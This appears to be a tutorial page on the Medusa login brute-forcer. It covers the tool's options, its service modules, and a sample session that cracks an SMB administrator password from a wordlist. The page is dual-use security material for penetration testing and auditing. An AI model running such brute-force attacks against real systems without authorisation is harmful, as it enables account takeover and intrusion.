Medusa is intended to be a speedy, massively parallel, modular, login brute-forcer. The goal is to support as many services which allow remote authentication as possible. The author considers following items as some of the key features of this application:

  • Thread-based parallel testing. Brute-force testing can be performed against multiple hosts, users or passwords concurrently.

  • Flexible user input. Target information (host/user/password) can be specified in a variety of ways. For example, each item can be either a single entry or a file containing multiple entries. Additionally, a combination file format allows the user to refine their target listing.

  • Modular design. Each service module exists as an independent .mod file. This means that no modifications are necessary to the core application in order to extend the supported list of services for brute-forcing.



Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]


  -h [TEXT]    : Target hostname or IP address
  -H [FILE]    : File containing target hostnames or IP addresses
  -u [TEXT]    : Username to test
  -U [FILE]    : File containing usernames to test
  -p [TEXT]    : Password to test
  -P [FILE]    : File containing passwords to test
  -C [FILE]    : File containing combo entries. See README for more information.
  -O [FILE]    : File to append log information to
  -e [n/s/ns]  : Additional password checks ([n] No Password, [s] Password = Username)
  -M [TEXT]    : Name of the module to execute (without the .mod extension)
  -m [TEXT]    : Parameter to pass to the module. This can be passed multiple times with a
                 different parameter each time and they will all be sent to the module (i.e.
                 -m Param1 -m Param2, etc.)
  -d           : Dump all known modules
  -n [NUM]     : Use for non-default TCP port number
  -s           : Enable SSL
  -g [NUM]     : Give up after trying to connect for NUM seconds (default 3)
  -r [NUM]     : Sleep NUM seconds between retry attempts (default 3)
  -R [NUM]     : Attempt NUM retries before giving up. The total number of attempts will be NUM + 1.
  -c [NUM]     : Time to wait in usec to verify socket is available (default 500 usec).
  -t [NUM]     : Total number of logins to be tested concurrently
  -T [NUM]     : Total number of hosts to be tested concurrently
  -L           : Parallelize logins using one username per thread. The default is to process 
                 the entire username before proceeding.
  -f           : Stop scanning host after first valid username/password found.
  -F           : Stop audit after first valid username/password found on any host.
  -b           : Suppress startup banner
  -q           : Display module's usage information Medusa 
  -v [NUM]     : Verbose level [0 - 6 (more)]
  -w [NUM]     : Error debug level [0 - 10 (more)]  Medusa 
  -V           : Display version Medusa 
  -Z [TEXT]    : Resume scan based on map of previous scan Medusa 


Checking available Modules :

cyborg@cyborg:~$ medusa -d
Medusa v2.1.1 [] (C) JoMo-Kun / Foofus Networks <[email protected]>

  Available modules in "." :

  Available modules in "/usr/local/lib/medusa/modules" :
    + cvs.mod : Brute force module for CVS sessions : version 2.0
    + ftp.mod : Brute force module for FTP/FTPS sessions : version 2.1
    + http.mod : Brute force module for HTTP : version 2.0
    + imap.mod : Brute force module for IMAP sessions : version 2.0
    + mssql.mod : Brute force module for M$-SQL sessions : version 2.0
    + mysql.mod : Brute force module for MySQL sessions : version 2.0
    + ncp.mod : Brute force module for NCP sessions : version 2.0
    + nntp.mod : Brute force module for NNTP sessions : version 2.0
    + pcanywhere.mod : Brute force module for PcAnywhere sessions : version 2.0
    + pop3.mod : Brute force module for POP3 sessions : version 2.0
    + postgres.mod : Brute force module for PostgreSQL sessions : version 2.0
    + rexec.mod : Brute force module for REXEC sessions : version 2.0
    + rlogin.mod : Brute force module for RLOGIN sessions : version 2.0
    + rsh.mod : Brute force module for RSH sessions : version 2.0
    + smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 2.0
    + smtp-vrfy.mod : Brute force module for enumerating accounts via SMTP VRFY : version 2.0
    + smtp.mod : Brute force module for SMTP Authentication with TLS : version 2.0
    + snmp.mod : Brute force module for SNMP Community Strings : version 2.1
    + ssh.mod : Brute force module for SSH v2 sessions : version 2.0
    + svn.mod : Brute force module for Subversion sessions : version 2.0
    + telnet.mod : Brute force module for telnet sessions : version 2.0
    + vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 2.0
    + vnc.mod : Brute force module for VNC sessions : version 2.1
    + web-form.mod : Brute force module for web forms : version 2.1
    + wrapper.mod : Generic Wrapper Module : version 2.0

Using SMBNT :

cyborg@cyborg:~$ medusa -h -u administrator -P dict.txt -e ns -M smbnt
Medusa v2.1.1 [] (C) JoMo-Kun / Foofus Networks <[email protected]>

ACCOUNT CHECK: [smbnt] Host: (1 of 1, 0 complete) User: administrator (1 of 1, 0 complete) Password:  (1 of 5 complete)
ACCOUNT CHECK: [smbnt] Host: (1 of 1, 0 complete) User: administrator (1 of 1, 0 complete) Password: administrator (2 of 5 complete)
ACCOUNT CHECK: [smbnt] Host: (1 of 1, 0 complete) User: administrator (1 of 1, 0 complete) Password: admin (3 of 5 complete)
ACCOUNT CHECK: [smbnt] Host: (1 of 1, 0 complete) User: administrator (1 of 1, 0 complete) Password: password (4 of 5 complete)
ACCOUNT CHECK: [smbnt] Host: (1 of 1, 0 complete) User: administrator (1 of 1, 0 complete) Password: toor (5 of 5 complete)
ACCOUNT FOUND: [smbnt] Host: User: administrator Password: toor [SUCCESS]

Leave a reply


We're are building as a community and a team. Be a part of it.


©2018 Ztrela Knowledge Solutions Pvt. Ltd

Log in with your credentials

Forgot your details?